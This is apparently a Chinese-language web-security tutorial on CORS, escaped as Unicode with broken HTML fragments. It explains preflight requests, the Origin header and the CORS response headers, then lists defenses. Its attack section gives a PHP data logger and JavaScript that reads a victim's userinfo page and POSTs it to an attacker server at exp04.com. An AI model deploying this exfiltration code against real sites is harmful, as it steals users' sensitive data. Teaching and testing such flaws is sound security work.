CORS \u5b9a\u4e49\u4e86\u4e24\u79cd\u8de8\u57df\u8bf7\u6c42\uff1a\u7b80\u5355\u8bf7\u6c42 \u548c \u975e\u7b80\u5355\u8bf7\u6c42\u3002\u7b80\u5355\u8de8\u57df\u8bf7\u6c42\u5c31\u662f\u4f7f\u7528\u8bbe\u5b9a\u7684\u8bf7\u6c42\u65b9\u5f0f\u8bf7\u6c42\u6570\u636e\uff0c\u800c\u975e\u7b80\u5355\u8de8\u57df\u8bf7\u6c42\u5219\u662f\u5728\u4f7f\u7528\u8bbe\u5b9a\u7684\u8bf7\u6c42\u65b9\u5f0f\u8bf7\u6c42\u6570\u636e\u4e4b\u524d\uff0c\u5148\u53d1\u9001\u4e00\u4e2a OPTIONS \u9884\u68c0\u8bf7\u6c42\uff0c\u9a8c\u8bc1\u8bf7\u6c42\u6e90\u662f\u5426\u4e3a\u670d\u52a1\u7aef\u5141\u8bb8\u6e90\u3002\u53ea\u6709"\u9884\u68c0"\u901a\u8fc7\u540e\u624d\u4f1a\u518d\u53d1\u9001\u4e00\u6b21\u8bf7\u6c42\u7528\u4e8e\u6570\u636e\u4f20\u8f93<\/p>\n
\u5f53\u6211\u4eec\u9700\u8981\u53d1\u9001\u4e00\u4e2a\u8de8\u57df\u8bf7\u6c42\u7684\u65f6\u5019\uff0c\u6d4f\u89c8\u5668\u4f1a\u9996\u5148\u68c0\u67e5\u8fd9\u4e2a\u8bf7\u6c42\uff0c\u5982\u679c\u5b83\u662f\u7b80\u5355\u8de8\u57df\u8bf7\u6c42\uff0c\u6d4f\u89c8\u5668\u5c31\u4f1a\u7acb\u523b\u53d1\u9001\u8fd9\u4e2a\u8bf7\u6c42\u3002\u5982\u679c\u5b83\u662f\u975e\u7b80\u5355\u8de8\u57df\u8bf7\u6c42\uff0c\u8fd9\u65f6\u5019\u6d4f\u89c8\u5668\u4e0d\u4f1a\u9a6c\u4e0a\u53d1\u9001\u8fd9\u4e2a\u8bf7\u6c42\uff0c\u800c\u662f\u6709\u4e00\u4e2a\u8ddf\u670d\u52a1\u5668\u9884\u68c0\u9a8c\u8bc1\u7684\u8fc7\u7a0b<\/p>\n
CORS \u8fd0\u884c\u673a\u5236<\/h1>\n
\u5728\u6d4f\u89c8\u5668\u8fdb\u884c\u8bf7\u6c42\u65f6\uff0c\u81ea\u52a8\u5728\u8bf7\u6c42\u5934\u4e2d\u6dfb\u52a0 Origin \u5b57\u6bb5\uff0c<\/p>\n
\u670d\u52a1\u7aef\u901a\u8fc7\u9a8c\u8bc1 Origin \u5b57\u6bb5\u6765\u5224\u65ad\u8bf7\u6c42\u662f\u5426\u88ab\u5141\u8bb8\uff0c\u4ece\u800c\u5b9e\u73b0\u6d4f\u89c8\u5668\u8fdb\u884c\u8de8\u6e90\u8bbf\u95ee<\/p>\n
CORS \u6f0f\u6d1e<\/h1>\n
\u6d4f\u89c8\u5668\u81ea\u52a8\u5728 Http \u8bf7\u6c42\u5934\u52a0\u4e0a Origin \u5b57\u6bb5\uff0c\u670d\u52a1\u5668\u901a\u8fc7\u5224\u65ad Origin \u5b57\u6bb5\u7684\u503c\u6765\u5224\u65ad \u8bf7\u6c42\u662f\u5426\u53ef\u4ee5\u8bfb\u53d6\u672c\u7ad9\u8d44\u6e90<\/p>\n
\u8de8\u57df\u7684\u5b57\u5178\u89e3\u91ca<\/strong><\/p>\n Access-Control-Allow-Origin\uff1a\u8be5\u5b57\u6bb5\u662f\u5fc5\u987b\u7684\u3002\u5b83\u7684\u503c\u8981\u4e48\u662f\u8bf7\u6c42\u65f6 Origin \u5b57\u6bb5\u7684\u503c\uff0c\u8981\u4e48\u662f\u4e00\u4e2a*\uff0c\u8868\u793a\u63a5\u53d7\u4efb\u610f\u57df\u540d\u7684\u8bf7\u6c42\u3002<\/p>\n Access-Control-Allow-Credentials\uff1a\u8be5\u5b57\u6bb5\u53ef\u9009\u3002\u5b83\u7684\u503c\u662f\u4e00\u4e2a\u5e03\u5c14\u503c\uff0c\u8868\u793a\u662f\u5426\u5141\u8bb8\u53d1\u9001 Cookie\u3002\u9ed8\u8ba4\u60c5\u51b5\u4e0b\uff0cCookie \u4e0d\u5305\u62ec\u5728 CORS \u8bf7\u6c42\u4e4b\u4e2d\u3002\u5f53\u8bbe\u7f6e\u4e3a true \u65f6\uff0c\u5373\u8868\u793a\u670d\u52a1\u5668\u660e\u786e\u8bb8\u53ef\uff0cCookie \u53ef\u4ee5\u5305\u542b\u5728\u8bf7\u6c42\u4e2d\uff0c\u4e00\u8d77\u53d1\u7ed9\u670d\u52a1\u5668\u3002\u8fd9\u4e2a\u503c\u4e5f\u53ea\u80fd\u8bbe\u4e3a true\uff0c\u5982\u679c\u670d\u52a1\u5668\u4e0d\u8981\u6d4f\u89c8\u5668\u53d1\u9001 Cookie\uff0c\u5220\u9664\u8be5\u5b57\u6bb5\u5373\u53ef<\/p>\n Access-Control-Expose-Headers \uff1a \u8be5\u5b57\u6bb5\u53ef\u9009 \u3002 CORS \u8bf7 \u6c42 \u65f6 \uff0c XMLHttpRequest \u5bf9\u8c61\u7684getResponseHeader()\u65b9\u6cd5\u53ea\u80fd\u62ff\u5230 6 \u4e2a\u57fa\u672c\u5b57\u6bb5\uff1aCache-Control\u3001Content-Language\u3001Content-Type\u3001Expires\u3001Last-Modified\u3001Pragma\u3002\u5982\u679c\u60f3\u62ff\u5230\u5176\u4ed6\u5b57\u6bb5\uff0c\u5c31\u5fc5\u987b\u5728 Access-Control-Expose-Headers \u91cc\u9762\u6307\u5b9a<\/p>\n \u8bbf\u95ee\u8fd9\u9875\u9762\u67e5\u770b\u7f51\u7edc Access-Control-Allow-Origin \u8bbe\u7f6e\u4e3a* \u6240\u6709\u57df\u540d\u53ef\u4ee5\u8bf7\u6c42\u672c\u7ad9\u8d44\u6e90<\/p>\n Access-Control-Allow-Credentials: true \u8fd9\u4e2a\u662f\u7684\u65f6\u5019\u53ef\u4ee5\u5141\u8bb8\u5e26\u6709 cookie \u8bbf\u95ee<\/p>\n \u628a\u6784\u9020\u597d\u7684\u6076\u610f\u4ee3\u7801\u642d\u5efa\u5728\u8fdc\u7a0b\u670d\u52a1\u4e0a\uff0c\u8ba9\u53d7\u5bb3\u8005\u8fdb\u884c\u8bbf\u95ee\uff0c\u5373\u53ef\u83b7\u53d6\u53d7\u5bb3\u8005\u7684\u654f\u611f\u4fe1\u606f<\/p>\n \u9996\u5148\u5728\u8fdc\u7a0b\u670d\u52a1\u5668\u4e0a\u51c6\u5907\u8bb0\u5f55\u4ee3\u7801<\/p>\n \u6784\u9020\u6076\u610f\u4ee3\u7801<\/p>\n \u5f53\u53d7\u5bb3\u8005\u6d4f\u89c8\u5668\u6b64\u9875\u9762\u65f6\uff0c\u5c31\u4f1a\u8bbf\u95ee\u654f\u611f\u4fe1\u606f\uff0c\u4f1a\u628a\u654f\u611f\u4fe1\u606f\u53d1\u9001\u5230\u8fdc\u7a0b\u670d\u52a1\u5668\u4e0a<\/p>\n 1.\u4e0d\u8981\u914d\u7f6e"Access-Control-Allow-Origin" \u4e3a\u901a\u914d\u7b26\u201c*\u201d,\u800c\u4e14\u66f4\u91cd\u8981\u7684\u662f\uff0c\u8981\u4e25\u683c\u6548\u9a8c\u6765\u81ea\u8bf7\u6c42\u6570\u636e\u5305\u4e2d\u7684"Origin" \u7684\u503c\u3002\u5f53\u6536\u5230\u8de8\u57df\u8bf7\u6c42\u7684\u65f6\u5019\uff0c\u8981\u68c0\u67e5"Origin" \u7684\u503c\u662f\u5426\u662f\u4e00\u4e2a\u53ef\u4fe1\u7684\u6e90\uff0c \u8fd8\u8981\u68c0\u67e5\u662f\u5426\u4e3a null<\/p>\n 2.\u907f\u514d\u4f7f\u7528"Access-Control-Allow-Credentials: true"<\/p>\n 3.\u51cf\u5c11 Access-Control- Allow-Methods \u6240\u5141\u8bb8\u7684\u65b9\u6cd5<\/p>\nCORS\u6f0f\u6d1e\u89e3\u6790<\/h1>\n
![\"1746421153030-4024b38a-a836-4f54-bd76-bcf231079138.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae5ac73091.png\")
<\/p>\nCORS\u8de8\u57df\u8d44\u6e90\u6f0f\u6d1e\u653b\u51fb<\/h1>\n
<!DOCTYPE html>\n<html lang=\"en\">\n<head>\n<meta charset=\"UTF-8\">\n<title>Cors<\/title>\n<\/head>\n<body>\n<script>\nfunction cors() {\nvar xhr = new XMLHttpRequest();\nxhr.onreadystatechange = function () {\nif(xhr.readyState == 4){\nalert(xhr.responseText);\n}\n}\n\/\/ xhr.= twithCredentials rue;\nxhr.open(\"GET\",'http:\/\/www.exp03.com\/csrf\/userinfo.php');\nxhr.send();\n}\ncors();\n<\/script>\n<\/body>\n<\/html><\/code><\/pre>\nCORS\u8de8\u57df\u8d44\u6e90\u5171\u4eab\u653b\u51fb\u5229\u7528<\/h1>\n
<?php\n$data = $_POST['moon'];\nif($data){\n$myfile = fopen(\"data.html\",\"w\");\nfwrite($myfile,$data);\nfclose($myfile);\n}<\/code><\/pre>\n<\/head>\n<body>\n<script>\nfunction cors() {\nvar xhr = new XMLHttpRequest();\nvar xhr1 = new XMLHttpRequest();\nxhr.onreadystatechange = function () {\nif(xhr.readyState == 4){\nalert(xhr.responseText)\nvar data = xhr.responseText;\nxhr1.open(\"POST\",\"http:\/\/www.exp04.com\/moon.php\",true);\nxhr1.setRequestHeader(\"Content-type\",\"application\/x-www-form-urlencoded\");\nalert(data);\nxhr1.send(\"moon=\"+escape(data));\n\/\/ body = document.getElementsByTagName('body')\n\/\/ body[0].innerHTML = xhr.responseText;\n}\n}\n\/\/xhr.withCredentials = true;\nxhr.open(\"GET\",'http:\/\/www.exp03.com\/csrf\/userinfo.php');\nxhr.send();\n}\ncors();\n<\/script>\n<\/body>\n<\/html><\/code><\/pre>\n![\"1746423994274-965f7de6-0009-4b4b-a636-e607333f902d.png\"](\"https:\/\/cdn.picui.cn\/vip\/2025\/10\/24\/68fae5afc76e5.png\")
<\/p>\n\u9632\u5fa1\u65b9\u6848<\/h1>\n
\n